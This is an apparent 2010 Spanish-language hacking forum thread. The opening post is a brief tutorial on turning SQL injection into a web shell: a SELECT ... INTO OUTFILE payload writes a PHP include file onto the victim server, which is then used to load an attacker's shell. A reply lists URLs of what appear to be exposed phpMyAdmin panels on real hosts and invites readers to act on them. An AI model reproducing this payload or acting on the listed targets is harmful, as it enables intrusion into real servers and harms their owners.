| Autor |
Mensaje (Ver Versión para Imprimir)
|
Mensajes: 80
Registrad@:
07/01/2010
Estado: Desconectad@ |
Inyección SQL + Shell.
#Inyección SQL + SHELL
#s3cure
#HSLTeam.com!
#Inicio
No vamos a entrar en detalles de SQL y todo eso, ya que se debe tener previo conocimiento para poder manejar este ataque.
La idea es la siguiente:
Mediente una consulta SQL, hacer un include.
El include tendrá que tener el OUTFILE que será nuestra shell.
el código sería:
[code>
SELECT '<?PHP include($GET_[$VAR>); ?>'
INTO OUTFIle 'nuestra_shell'
[/code>
Ya que se puede introducir un include y crear la "vulnerabildiad" al RFI, sólo se debe tener un poco de conocimiento en las inyecciones.
Ahora podemos observar, como fácilmente: victima.com/nuestra_shell?VAR=shell.txt
y ya obtuvimos la shell mediante inyecciones SQL.
Recordatorio: shell.txt es la shell que querramos visualisar.
#FINAL
salu2. :)
Creer que todo es genial para luego ver realidad. |
| 14/01/2010 05:56:49 | |
Mensajes: 80
Registrad@:
21/01/2009
Estado: Desconectad@ |
RE: Inyección SQL + Shell.
yeah por ahi vi este codigo en diosdelared publikado por murder aki van algunos ejemplos saludos
http://www.mühlebner.at/phpmyadmin/index.php?db=mysql&token=ef2ead305e9c8317f4b10c1b9c2d7f3c
http://92.115.117.246/phpmyadmin/
http://www.nafasms.com/phpmyadmin/
http://201.26.219.155/phpmyadmin/
ya sabran k hacer :)
SAlUDos |
| 15/01/2010 04:54:48 | |
.jpg)
